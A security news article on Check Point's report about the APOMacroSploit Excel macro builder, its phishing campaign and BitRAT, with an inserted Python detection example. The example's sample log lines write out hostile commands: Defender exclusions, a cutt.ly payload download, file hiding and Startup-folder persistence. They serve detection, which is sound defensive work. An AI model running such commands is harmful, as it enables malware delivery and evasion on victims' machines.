
Researchers uncovered a new Malware Builder dubbed APOMacroSploit

Researchers spotted a new Office malware builder, tracked as APOMacroSploit, that was employed in a campaign targeting more than 80 customers worldwide.

Researchers from security firm Check Point uncovered a new Office malware builder called APOMacroSploit, which was employed in attacks that targeted more than 80 customers worldwide.

APOMacroSploit is a macro builder used to create the weaponized Excel documents employed in multiple phishing attacks. The threat actor behind the tool continuously updated it to evade detection. Check Point researchers were able to unmask one of the threat actors behind the builder.

Excel documents created with the APOMacroSploit builder are capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection.

“The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script.” reads the analysis published by the researchers.

“Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product.”

Experts believe APOMacroSploit was created by two French-based threat actors “Apocaliptique” and “Nitrix” who were selling the product on HackForums.net.

About 40 hackers took part in the campaign the researchers uncovered in November; they used 100 different email senders to target users in more than 30 different countries.

“The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt.ly.” continues the analysis. “The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion.”

The researchers noticed that the attackers made a mistake: the cutt[.]ly domain redirects directly to a download server rather than performing the request on the back end. The servers host the BAT files, and for each file the customer's nickname was inserted into the filename.

The BAT script downloads the fola.exe malware for one of the following Windows versions:

  • Windows 10
  • Windows 8.1
  • Windows 8
  • Windows 7

To avoid detection, the BAT scripts add the malware location to the Windows Defender exclusion path and disable Windows cleanup before executing the malware.

In at least one attack, the threat actors used a Delphi Crypter along with a second-stage malware, a remote access Trojan dubbed BitRAT.

BitRAT implements multiple features, including cryptocurrency mining and RAT capabilities. Shellcode injected into Notepad.exe drops a VBS file in the startup folder to ensure persistence.
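The evasion and persistence steps described above (the attrib hiding, the Windows Defender exclusion, the shortener download, and the VBS dropped into the Startup folder from an injected Notepad.exe) turned into detection logic over process-creation records. This is an added example, not Check Point's tooling or anything from the report; the record format, the rule names and every sample value (paths, the cutt.ly URL, the file names) are constructed assumptions for illustration.

```python
import re

# Constructed process-creation records, "<timestamp> <parent image> -> <command line>"
# (sample data written for this example, not taken from the Check Point report).
SAMPLE_LOG = [
    r"2021-02-10T09:12:01Z EXCEL.EXE -> cmd.exe /c start /min %TEMP%\download.bat",
    r"2021-02-10T09:12:02Z cmd.exe -> attrib +h +s C:\Users\victim\AppData\Local\Temp\download.bat",
    r"2021-02-10T09:12:03Z cmd.exe -> powershell -w hidden Add-MpPreference -ExclusionPath C:\Users\victim\AppData\Roaming",
    r"2021-02-10T09:12:04Z cmd.exe -> powershell -w hidden Start-Sleep -s 3; Invoke-WebRequest https://cutt.ly/EXAMPLE -OutFile fola.exe",
    r'2021-02-10T09:12:05Z notepad.exe -> cmd.exe /c copy update.vbs "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"',
    r"2021-02-10T10:00:00Z explorer.exe -> notepad.exe C:\Users\victim\notes.txt",
]

# One rule per stage of the chain: (stage name, parent-image regex or None, command-line regex).
RULES = [
    ("office_spawns_shell", re.compile(r"^(EXCEL|WINWORD)\.EXE$", re.I), re.compile(r"^(cmd|powershell)(\.exe)?\b", re.I)),
    ("attrib_hide", None, re.compile(r"^attrib\b.*\+h", re.I)),
    ("defender_exclusion", None, re.compile(r"(Add|Set)-MpPreference\s+-Exclusion", re.I)),
    ("shortener_download", None, re.compile(r"https?://cutt\.ly/", re.I)),
    ("notepad_spawns_shell", re.compile(r"^notepad\.exe$", re.I), re.compile(r"^(cmd|powershell|wscript)", re.I)),
    ("startup_vbs_drop", None, re.compile(r"\.vbs\b.*\\Startup\\", re.I)),
]

def parse_record(record):
    """Split one record into (timestamp, parent image, command line)."""
    head, _, cmdline = record.partition(" -> ")
    timestamp, _, parent = head.partition(" ")
    return timestamp, parent, cmdline

def match_stages(parent, cmdline):
    """Names of every rule the record satisfies, in RULES order."""
    return [name for name, parent_re, cmd_re in RULES
            if (parent_re is None or parent_re.search(parent)) and cmd_re.search(cmdline)]

def scan(records):
    """(timestamp, parent, stages) for each record that trips at least one rule."""
    findings = []
    for record in records:
        timestamp, parent, cmdline = parse_record(record)
        stages = match_stages(parent, cmdline)
        if stages:
            findings.append((timestamp, parent, stages))
    return findings

def chain_coverage(findings):
    """Count of distinct stages seen; several stages on one host is the signal worth escalating."""
    return len({stage for _, _, stages in findings for stage in stages})
```

On the constructed records, `scan(SAMPLE_LOG)` flags five of the six lines and `chain_coverage` reports all six stages; a lone `defender_exclusion` hit may just be an administrator, so the stage count is what should drive escalation.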

The researchers were able to unmask the real identity of Nitrix because he revealed his actual name in a Twitter post containing a picture of a ticket he bought for a concert in December 2014.

Check Point Research shared its findings with law enforcement and included Indicators of Compromise (IoCs) for this campaign in the report.


Pierluigi Paganini
